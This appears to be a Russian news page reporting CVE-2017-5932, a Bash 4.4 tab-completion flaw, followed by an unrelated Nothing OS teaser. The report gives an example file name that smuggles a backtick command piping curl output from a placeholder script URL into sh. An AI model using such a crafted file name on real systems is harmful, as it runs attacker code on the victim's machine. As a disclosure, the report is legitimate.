Новости и события » Hi-Tech » Уязвимость в реализации автодополнения ввода в Bash

Уязвимость в реализации автодополнения ввода в Bash

В командном интерпретаторе Bash выявлена уязвимость (CVE-2017-5932), которая может быть использована для выполнения своего кода при выполнении операций автодополнения ввода клавишей табуляция. Проблема затрагивает только ветку Bash 4.4. Исправление пока доступно только в виде патча.

Проблема вызвана ошибкой в коде экранирования спецсимволов, связанной с неверной обработкой кавычек. Для эксплуатации достаточно создать файл со специально оформленным именем, при попытке выполнения операции автодополнения для данного файла будет выполнен определенные злоумышленником инструкции командного интерпретаора. Например, для эксплуатации достаточно создать файл с именемдлинная_строка "`curl ссылка_скрипт|sh`


Карл Пей представил новый дизайн Nothing OS 3.0

Карл Пей представил новый дизайн Nothing OS 3.0

Ожидается несколько нововведений. Например, можно будет выбрать один из трех вариантов оформления экрана блокировки: Default, Clock+Widgets и Expanded Widget Area. В первом случае на экране отображаются крупные часы и дата, во втором добавляются компактные...

сегодня 09:15

Свежие новости Украины на сегодня и последние события в мире экономики и политики, культуры и спорта, технологий, здоровья, происшествий, авто и мото

Вверх